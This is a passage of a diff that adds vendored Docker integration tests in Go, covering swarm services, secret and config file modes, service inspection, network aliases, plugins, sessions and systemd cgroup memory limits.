client.TaskInspectWithRaw(context.Background(), task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil && task.Status.ContainerStatus.ContainerID != "" + }) + + attach := swarm.ExecTask(t, d, task, types.ExecConfig{ + Cmd: []string{"/bin/cat", "/run/secrets/templated_secret"}, + AttachStdout: true, + AttachStderr: true, + }) + + expect := "SERVICE_NAME=" + serviceName + "\n" + + "this is a secret\n" + + "this is a config\n" + assertAttachedStream(t, attach, expect) + + attach = swarm.ExecTask(t, d, task, types.ExecConfig{ + Cmd: []string{"mount"}, + AttachStdout: true, + AttachStderr: true, + }) + assertAttachedStream(t, attach, "tmpfs on /run/secrets/templated_secret type tmpfs") +} + +func assertAttachedStream(t *testing.T, attach types.HijackedResponse, expect string) { + buf := bytes.NewBuffer(nil) + _, err := stdcopy.StdCopy(buf, buf, attach.Reader) + assert.NilError(t, err) + assert.Check(t, is.Contains(buf.String(), expect)) +} + +func waitAndAssert(t *testing.T, timeout time.Duration, f func(*testing.T) bool) { + t.Helper() + after := time.After(timeout) + for { + select { + case <-after: + t.Fatalf("timed out waiting for condition") + default: + } + if f(t) { + return + } + time.Sleep(100 * time.Millisecond) + } +} diff --git a/vendor/github.com/docker/docker/integration/service/create_test.go b/vendor/github.com/docker/docker/integration/service/create_test.go new file mode 100644 index 0000000000..a89ae0a172 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/create_test.go @@ -0,0 +1,374 @@ +package service // import "github.com/docker/docker/integration/service" + +import ( + "context" + "fmt" + "io/ioutil" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/network" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/internal/test/daemon" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" +) + +func TestServiceCreateInit(t *testing.T) { + defer setupTest(t)() + t.Run("daemonInitDisabled", testServiceCreateInit(false)) + t.Run("daemonInitEnabled", testServiceCreateInit(true)) +} + +func testServiceCreateInit(daemonEnabled bool) func(t *testing.T) { + return func(t *testing.T) { + var ops = []func(*daemon.Daemon){} + + if daemonEnabled { + ops = append(ops, daemon.WithInit) + } + d := swarm.NewSwarm(t, testEnv, ops...) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + booleanTrue := true + booleanFalse := false + + serviceID := swarm.CreateService(t, d) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll) + i := inspectServiceContainer(t, client, serviceID) + // HostConfig.Init == nil means that it delegates to daemon configuration + assert.Check(t, i.HostConfig.Init == nil) + + serviceID = swarm.CreateService(t, d, swarm.ServiceWithInit(&booleanTrue)) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll) + i = inspectServiceContainer(t, client, serviceID) + assert.Check(t, is.Equal(true, *i.HostConfig.Init)) + + serviceID = swarm.CreateService(t, d, swarm.ServiceWithInit(&booleanFalse)) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, 1), swarm.ServicePoll) + i = inspectServiceContainer(t, client, serviceID) + assert.Check(t, is.Equal(false, *i.HostConfig.Init)) + } +} + +func inspectServiceContainer(t *testing.T, client client.APIClient, serviceID string) types.ContainerJSON { + t.Helper() + filter := filters.NewArgs() + filter.Add("label", fmt.Sprintf("com.docker.swarm.service.id=%s", serviceID)) + containers, err := client.ContainerList(context.Background(), types.ContainerListOptions{Filters: filter}) + assert.NilError(t, err) + assert.Check(t, is.Len(containers, 1)) + + i, err := client.ContainerInspect(context.Background(), containers[0].ID) + assert.NilError(t, err) + return i +} + +func TestCreateServiceMultipleTimes(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + overlayName := "overlay1_" + t.Name() + overlayID := network.CreateNoError(t, context.Background(), client, overlayName, + network.WithCheckDuplicate(), + network.WithDriver("overlay"), + ) + + var instances uint64 = 4 + + serviceName := "TestService_" + t.Name() + serviceSpec := []swarm.ServiceSpecOpt{ + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(overlayName), + } + + serviceID := swarm.CreateService(t, d, serviceSpec...) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll) + + _, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + serviceID2 := swarm.CreateService(t, d, serviceSpec...) + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID2, instances), swarm.ServicePoll) + + err = client.ServiceRemove(context.Background(), serviceID2) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID2), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + err = client.NetworkRemove(context.Background(), overlayID) + assert.NilError(t, err) + + poll.WaitOn(t, networkIsRemoved(client, overlayID), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) +} + +func TestCreateWithDuplicateNetworkNames(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + name := "foo_" + t.Name() + n1 := network.CreateNoError(t, context.Background(), client, name, + network.WithDriver("bridge"), + ) + n2 := network.CreateNoError(t, context.Background(), client, name, + network.WithDriver("bridge"), + ) + + // Dupliates with name but with different driver + n3 := network.CreateNoError(t, context.Background(), client, name, + network.WithDriver("overlay"), + ) + + // Create Service with the same name + var instances uint64 = 1 + + serviceName := "top_" + t.Name() + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithNetwork(name), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll) + + resp, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{}) + assert.NilError(t, err) + assert.Check(t, is.Equal(n3, resp.Spec.TaskTemplate.Networks[0].Target)) + + // Remove Service + err = client.ServiceRemove(context.Background(), serviceID) + assert.NilError(t, err) + + // Make sure task has been destroyed. + poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + + // Remove networks + err = client.NetworkRemove(context.Background(), n3) + assert.NilError(t, err) + + err = client.NetworkRemove(context.Background(), n2) + assert.NilError(t, err) + + err = client.NetworkRemove(context.Background(), n1) + assert.NilError(t, err) + + // Make sure networks have been destroyed. + poll.WaitOn(t, networkIsRemoved(client, n3), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) + poll.WaitOn(t, networkIsRemoved(client, n2), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) + poll.WaitOn(t, networkIsRemoved(client, n1), poll.WithTimeout(1*time.Minute), poll.WithDelay(10*time.Second)) +} + +func TestCreateServiceSecretFileMode(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + secretName := "TestSecret_" + t.Name() + secretResp, err := client.SecretCreate(ctx, swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: secretName, + }, + Data: []byte("TESTSECRET"), + }) + assert.NilError(t, err) + + var instances uint64 = 1 + serviceName := "TestService_" + t.Name() + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithName(serviceName), + swarm.ServiceWithCommand([]string{"/bin/sh", "-c", "ls -l /etc/secret || /bin/top"}), + swarm.ServiceWithSecret(&swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: "/etc/secret", + UID: "0", + GID: "0", + Mode: 0777, + }, + SecretID: secretResp.ID, + SecretName: secretName, + }), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances), swarm.ServicePoll) + + filter := filters.NewArgs() + filter.Add("service", serviceID) + tasks, err := client.TaskList(ctx, types.TaskListOptions{ + Filters: filter, + }) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(tasks), 1)) + + body, err := client.ContainerLogs(ctx, tasks[0].Status.ContainerStatus.ContainerID, types.ContainerLogsOptions{ + ShowStdout: true, + }) + assert.NilError(t, err) + defer body.Close() + + content, err := ioutil.ReadAll(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(content), "-rwxrwxrwx")) + + err = client.ServiceRemove(ctx, serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll) + poll.WaitOn(t, noTasks(client), swarm.ServicePoll) + + err = client.SecretRemove(ctx, secretName) + assert.NilError(t, err) +} + +func TestCreateServiceConfigFileMode(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + ctx := context.Background() + configName := "TestConfig_" + t.Name() + configResp, err := client.ConfigCreate(ctx, swarmtypes.ConfigSpec{ + Annotations: swarmtypes.Annotations{ + Name: configName, + }, + Data: []byte("TESTCONFIG"), + }) + assert.NilError(t, err) + + var instances uint64 = 1 + serviceName := "TestService_" + t.Name() + serviceID := swarm.CreateService(t, d, + swarm.ServiceWithName(serviceName), + swarm.ServiceWithCommand([]string{"/bin/sh", "-c", "ls -l /etc/config || /bin/top"}), + swarm.ServiceWithReplicas(instances), + swarm.ServiceWithConfig(&swarmtypes.ConfigReference{ + File: &swarmtypes.ConfigReferenceFileTarget{ + Name: "/etc/config", + UID: "0", + GID: "0", + Mode: 0777, + }, + ConfigID: configResp.ID, + ConfigName: configName, + }), + ) + + poll.WaitOn(t, serviceRunningTasksCount(client, serviceID, instances)) + + filter := filters.NewArgs() + filter.Add("service", serviceID) + tasks, err := client.TaskList(ctx, types.TaskListOptions{ + Filters: filter, + }) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(tasks), 1)) + + body, err := client.ContainerLogs(ctx, tasks[0].Status.ContainerStatus.ContainerID, types.ContainerLogsOptions{ + ShowStdout: true, + }) + assert.NilError(t, err) + defer body.Close() + + content, err := ioutil.ReadAll(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(content), "-rwxrwxrwx")) + + err = client.ServiceRemove(ctx, serviceID) + assert.NilError(t, err) + + poll.WaitOn(t, serviceIsRemoved(client, serviceID)) + poll.WaitOn(t, noTasks(client)) + + err = client.ConfigRemove(ctx, configName) + assert.NilError(t, err) +} + +func serviceRunningTasksCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", serviceID) + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == int(instances): + for _, task := range tasks { + if task.Status.State != swarmtypes.TaskStateRunning { + return poll.Continue("waiting for tasks to enter run state") + } + } + return poll.Success() + default: + return poll.Continue("task count at %d waiting for %d", len(tasks), instances) + } + } +} + +func noTasks(client client.ServiceAPIClient) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == 0: + return poll.Success() + default: + return poll.Continue("task count at %d waiting for 0", len(tasks)) + } + } +} + +func serviceIsRemoved(client client.ServiceAPIClient, serviceID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", serviceID) + _, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + if err == nil { + return poll.Continue("waiting for service %s to be deleted", serviceID) + } + return poll.Success() + } +} + +func networkIsRemoved(client client.NetworkAPIClient, networkID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + _, err := client.NetworkInspect(context.Background(), networkID, types.NetworkInspectOptions{}) + if err == nil { + return poll.Continue("waiting for network %s to be removed", networkID) + } + return poll.Success() + } +} diff --git a/vendor/github.com/docker/docker/integration/service/inspect_test.go b/vendor/github.com/docker/docker/integration/service/inspect_test.go new file mode 100644 index 0000000000..daeabcfe12 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/inspect_test.go @@ -0,0 +1,153 @@ +package service // import "github.com/docker/docker/integration/service" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/swarm" + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestInspect(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + + var now = time.Now() + var instances uint64 = 2 + serviceSpec := fullSwarmServiceSpec("test-service-inspect", instances) + + ctx := context.Background() + resp, err := client.ServiceCreate(ctx, serviceSpec, types.ServiceCreateOptions{ + QueryRegistry: false, + }) + assert.NilError(t, err) + + id := resp.ID + poll.WaitOn(t, serviceContainerCount(client, id, instances)) + + service, _, err := client.ServiceInspectWithRaw(ctx, id, types.ServiceInspectOptions{}) + assert.NilError(t, err) + + expected := swarmtypes.Service{ + ID: id, + Spec: serviceSpec, + Meta: swarmtypes.Meta{ + Version: swarmtypes.Version{Index: uint64(11)}, + CreatedAt: now, + UpdatedAt: now, + }, + } + assert.Check(t, is.DeepEqual(service, expected, cmpServiceOpts())) +} + +// TODO: use helpers from gotest.tools/assert/opt when available +func cmpServiceOpts() cmp.Option { + const threshold = 20 * time.Second + + metaTimeFields := func(path cmp.Path) bool { + switch path.String() { + case "Meta.CreatedAt", "Meta.UpdatedAt": + return true + } + return false + } + withinThreshold := cmp.Comparer(func(x, y time.Time) bool { + delta := x.Sub(y) + return delta < threshold && delta > -threshold + }) + + return cmp.FilterPath(metaTimeFields, withinThreshold) +} + +func fullSwarmServiceSpec(name string, replicas uint64) swarmtypes.ServiceSpec { + restartDelay := 100 * time.Millisecond + maxAttempts := uint64(4) + + return swarmtypes.ServiceSpec{ + Annotations: swarmtypes.Annotations{ + Name: name, + Labels: map[string]string{ + "service-label": "service-label-value", + }, + }, + TaskTemplate: swarmtypes.TaskSpec{ + ContainerSpec: &swarmtypes.ContainerSpec{ + Image: "busybox:latest", + Labels: map[string]string{"container-label": "container-value"}, + Command: []string{"/bin/top"}, + Args: []string{"-u", "root"}, + Hostname: "hostname", + Env: []string{"envvar=envvalue"}, + Dir: "/work", + User: "root", + StopSignal: "SIGINT", + StopGracePeriod: &restartDelay, + Hosts: []string{"8.8.8.8 google"}, + DNSConfig: &swarmtypes.DNSConfig{ + Nameservers: []string{"8.8.8.8"}, + Search: []string{"somedomain"}, + }, + Isolation: container.IsolationDefault, + }, + RestartPolicy: &swarmtypes.RestartPolicy{ + Delay: &restartDelay, + Condition: swarmtypes.RestartPolicyConditionOnFailure, + MaxAttempts: &maxAttempts, + }, + Runtime: swarmtypes.RuntimeContainer, + }, + Mode: swarmtypes.ServiceMode{ + Replicated: &swarmtypes.ReplicatedService{ + Replicas: &replicas, + }, + }, + UpdateConfig: &swarmtypes.UpdateConfig{ + Parallelism: 2, + Delay: 200 * time.Second, + FailureAction: swarmtypes.UpdateFailureActionContinue, + Monitor: 2 * time.Second, + MaxFailureRatio: 0.2, + Order: swarmtypes.UpdateOrderStopFirst, + }, + RollbackConfig: &swarmtypes.UpdateConfig{ + Parallelism: 3, + Delay: 300 * time.Second, + FailureAction: swarmtypes.UpdateFailureActionPause, + Monitor: 3 * time.Second, + MaxFailureRatio: 0.3, + Order: swarmtypes.UpdateOrderStartFirst, + }, + } +} + +func serviceContainerCount(client client.ServiceAPIClient, id string, count uint64) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + filter := filters.NewArgs() + filter.Add("service", id) + tasks, err := client.TaskList(context.Background(), types.TaskListOptions{ + Filters: filter, + }) + switch { + case err != nil: + return poll.Error(err) + case len(tasks) == int(count): + return poll.Success() + default: + return poll.Continue("task count at %d waiting for %d", len(tasks), count) + } + } +} diff --git a/vendor/github.com/docker/docker/integration/service/main_test.go b/vendor/github.com/docker/docker/integration/service/main_test.go new file mode 100644 index 0000000000..28fd19df4d --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/main_test.go @@ -0,0 +1,33 @@ +package service // import "github.com/docker/docker/integration/service" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/service/network_test.go b/vendor/github.com/docker/docker/integration/service/network_test.go new file mode 100644 index 0000000000..4ebbd972a8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/network_test.go @@ -0,0 +1,75 @@ +package service // import "github.com/docker/docker/integration/service" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/integration/internal/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDockerNetworkConnectAlias(t *testing.T) { + defer setupTest(t)() + d := swarm.NewSwarm(t, testEnv) + defer d.Stop(t) + client := d.NewClientT(t) + defer client.Close() + ctx := context.Background() + + name := t.Name() + "test-alias" + _, err := client.NetworkCreate(ctx, name, types.NetworkCreate{ + Driver: "overlay", + Attachable: true, + }) + assert.NilError(t, err) + + cID1 := container.Create(t, ctx, client, func(c *container.TestContainerConfig) { + c.NetworkingConfig = &network.NetworkingConfig{ + EndpointsConfig: map[string]*network.EndpointSettings{ + name: {}, + }, + } + }) + + err = client.NetworkConnect(ctx, name, cID1, &network.EndpointSettings{ + Aliases: []string{ + "aaa", + }, + }) + assert.NilError(t, err) + + err = client.ContainerStart(ctx, cID1, types.ContainerStartOptions{}) + assert.NilError(t, err) + + ng1, err := client.ContainerInspect(ctx, cID1) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(ng1.NetworkSettings.Networks[name].Aliases), 2)) + assert.Check(t, is.Equal(ng1.NetworkSettings.Networks[name].Aliases[0], "aaa")) + + cID2 := container.Create(t, ctx, client, func(c *container.TestContainerConfig) { + c.NetworkingConfig = &network.NetworkingConfig{ + EndpointsConfig: map[string]*network.EndpointSettings{ + name: {}, + }, + } + }) + + err = client.NetworkConnect(ctx, name, cID2, &network.EndpointSettings{ + Aliases: []string{ + "bbb", + }, + }) + assert.NilError(t, err) + + err = client.ContainerStart(ctx, cID2, types.ContainerStartOptions{}) + assert.NilError(t, err) + + ng2, err := client.ContainerInspect(ctx, cID2) + assert.NilError(t, err) + assert.Check(t, is.Equal(len(ng2.NetworkSettings.Networks[name].Aliases), 2)) + assert.Check(t, is.Equal(ng2.NetworkSettings.Networks[name].Aliases[0], "bbb")) +} diff --git a/vendor/github.com/docker/docker/integration/service/plugin_test.go b/vendor/github.com/docker/docker/integration/service/plugin_test.go new file mode 100644 index 0000000000..6c61825220 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/service/plugin_test.go @@ -0,0 +1,121 @@ +package service + +import ( + "context" + "io" + "io/ioutil" + "os" + "path" + "testing" + + "github.com/docker/docker/api/types" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/swarm/runtime" + "github.com/docker/docker/integration/internal/swarm" + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/fixtures/plugin" + "github.com/docker/docker/internal/test/registry" + "gotest.tools/assert" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestServicePlugin(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + skip.If(t, testEnv.DaemonInfo.OSType == "windows") + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTest(t)() + + reg := registry.NewV2(t) + defer reg.Close() + + repo := path.Join(registry.DefaultURL, "swarm", "test:v1") + repo2 := path.Join(registry.DefaultURL, "swarm", "test:v2") + name := "test" + + d := daemon.New(t) + d.StartWithBusybox(t) + apiclient := d.NewClientT(t) + err := plugin.Create(context.Background(), apiclient, repo) + assert.NilError(t, err) + r, err := apiclient.PluginPush(context.Background(), repo, "") + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, r) + assert.NilError(t, err) + err = apiclient.PluginRemove(context.Background(), repo, types.PluginRemoveOptions{}) + assert.NilError(t, err) + err = plugin.Create(context.Background(), apiclient, repo2) + assert.NilError(t, err) + r, err = apiclient.PluginPush(context.Background(), repo2, "") + assert.NilError(t, err) + _, err = io.Copy(ioutil.Discard, r) + assert.NilError(t, err) + err = apiclient.PluginRemove(context.Background(), repo2, types.PluginRemoveOptions{}) + assert.NilError(t, err) + d.Stop(t) + + d1 := swarm.NewSwarm(t, testEnv, daemon.WithExperimental) + defer d1.Stop(t) + d2 := daemon.New(t, daemon.WithExperimental, daemon.WithSwarmPort(daemon.DefaultSwarmPort+1)) + d2.StartAndSwarmJoin(t, d1, true) + defer d2.Stop(t) + d3 := daemon.New(t, daemon.WithExperimental, daemon.WithSwarmPort(daemon.DefaultSwarmPort+2)) + d3.StartAndSwarmJoin(t, d1, false) + defer d3.Stop(t) + + id := d1.CreateService(t, makePlugin(repo, name, nil)) + poll.WaitOn(t, d1.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsRunning(name), swarm.ServicePoll) + + service := d1.GetService(t, id) + d1.UpdateService(t, service, makePlugin(repo2, name, nil)) + poll.WaitOn(t, d1.PluginReferenceIs(name, repo2), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginReferenceIs(name, repo2), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginReferenceIs(name, repo2), swarm.ServicePoll) + poll.WaitOn(t, d1.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsRunning(name), swarm.ServicePoll) + + d1.RemoveService(t, id) + poll.WaitOn(t, d1.PluginIsNotPresent(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsNotPresent(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll) + + // constrain to managers only + id = d1.CreateService(t, makePlugin(repo, name, []string{"node.role==manager"})) + poll.WaitOn(t, d1.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsRunning(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll) + + d1.RemoveService(t, id) + poll.WaitOn(t, d1.PluginIsNotPresent(name), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsNotPresent(name), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsNotPresent(name), swarm.ServicePoll) + + // with no name + id = d1.CreateService(t, makePlugin(repo, "", nil)) + poll.WaitOn(t, d1.PluginIsRunning(repo), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsRunning(repo), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsRunning(repo), swarm.ServicePoll) + + d1.RemoveService(t, id) + poll.WaitOn(t, d1.PluginIsNotPresent(repo), swarm.ServicePoll) + poll.WaitOn(t, d2.PluginIsNotPresent(repo), swarm.ServicePoll) + poll.WaitOn(t, d3.PluginIsNotPresent(repo), swarm.ServicePoll) +} + +func makePlugin(repo, name string, constraints []string) func(*swarmtypes.Service) { + return func(s *swarmtypes.Service) { + s.Spec.TaskTemplate.Runtime = "plugin" + s.Spec.TaskTemplate.PluginSpec = &runtime.PluginSpec{ + Name: name, + Remote: repo, + } + if constraints != nil { + s.Spec.TaskTemplate.Placement = &swarmtypes.Placement{ + Constraints: constraints, + } + } + } +} diff --git a/vendor/github.com/docker/docker/integration/session/main_test.go b/vendor/github.com/docker/docker/integration/session/main_test.go new file mode 100644 index 0000000000..fc33025efe --- /dev/null +++ b/vendor/github.com/docker/docker/integration/session/main_test.go @@ -0,0 +1,33 @@ +package session // import "github.com/docker/docker/integration/session" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/session/session_test.go b/vendor/github.com/docker/docker/integration/session/session_test.go new file mode 100644 index 0000000000..67a3773abd --- /dev/null +++ b/vendor/github.com/docker/docker/integration/session/session_test.go @@ -0,0 +1,48 @@ +package session // import "github.com/docker/docker/integration/session" + +import ( + "net/http" + "testing" + + req "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestSessionCreate(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) + + defer setupTest(t)() + + res, body, err := req.Post("/session", req.With(func(r *http.Request) error { + r.Header.Set("X-Docker-Expose-Session-Uuid", "testsessioncreate") // so we don't block default name if something else is using it + r.Header.Set("Upgrade", "h2c") + return nil + })) + assert.NilError(t, err) + assert.NilError(t, body.Close()) + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusSwitchingProtocols)) + assert.Check(t, is.Equal(res.Header.Get("Upgrade"), "h2c")) +} + +func TestSessionCreateWithBadUpgrade(t *testing.T) { + skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild) + + res, body, err := req.Post("/session") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusBadRequest)) + buf, err := req.ReadBody(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(buf), "no upgrade")) + + res, body, err = req.Post("/session", req.With(func(r *http.Request) error { + r.Header.Set("Upgrade", "foo") + return nil + })) + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusBadRequest)) + buf, err = req.ReadBody(body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(buf), "not supported")) +} diff --git a/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go b/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go new file mode 100644 index 0000000000..449c83fdab --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/cgroupdriver_systemd_test.go @@ -0,0 +1,56 @@ +package system + +import ( + "context" + "os" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/daemon" + + "gotest.tools/assert" +) + +// hasSystemd checks whether the host was booted with systemd as its init +// system. Stolen from +// https://github.com/coreos/go-systemd/blob/176f85496f4e/util/util.go#L68 +func hasSystemd() bool { + fi, err := os.Lstat("/run/systemd/system") + if err != nil { + return false + } + return fi.IsDir() +} + +// TestCgroupDriverSystemdMemoryLimit checks that container +// memory limit can be set when using systemd cgroupdriver. +// https://github.com/moby/moby/issues/35123 +func TestCgroupDriverSystemdMemoryLimit(t *testing.T) { + t.Parallel() + + if !hasSystemd() { + t.Skip("systemd not available") + } + + d := daemon.New(t) + client, err := d.NewClient() + assert.NilError(t, err) + d.StartWithBusybox(t, "--exec-opt", "native.cgroupdriver=systemd", "--iptables=false") + defer d.Stop(t) + + const mem = 64 * 1024 * 1024 // 64 MB + + ctx := context.Background() + ctrID := container.Create(t, ctx, client, func(c *container.TestContainerConfig) { + c.HostConfig.Resources.Memory = mem + }) + defer client.ContainerRemove(ctx, ctrID, types.ContainerRemoveOptions{Force: true}) + + err = client.ContainerStart(ctx, ctrID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + s, err := client.ContainerInspect(ctx, ctrID) + assert.NilError(t, err) + assert.Equal(t, s.HostConfig.Memory, mem) +} diff --git a/vendor/github.com/docker/docker/integration/system/event_test.go b/vendor/github.com/docker/docker/integration/system/event_test.go new file mode 100644 index 0000000000..6e86f4ad95 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/event_test.go @@ -0,0 +1,122 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "encoding/json" + "io" + "net/http" + "net/url" + "strconv" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + req "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/jsonmessage" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func 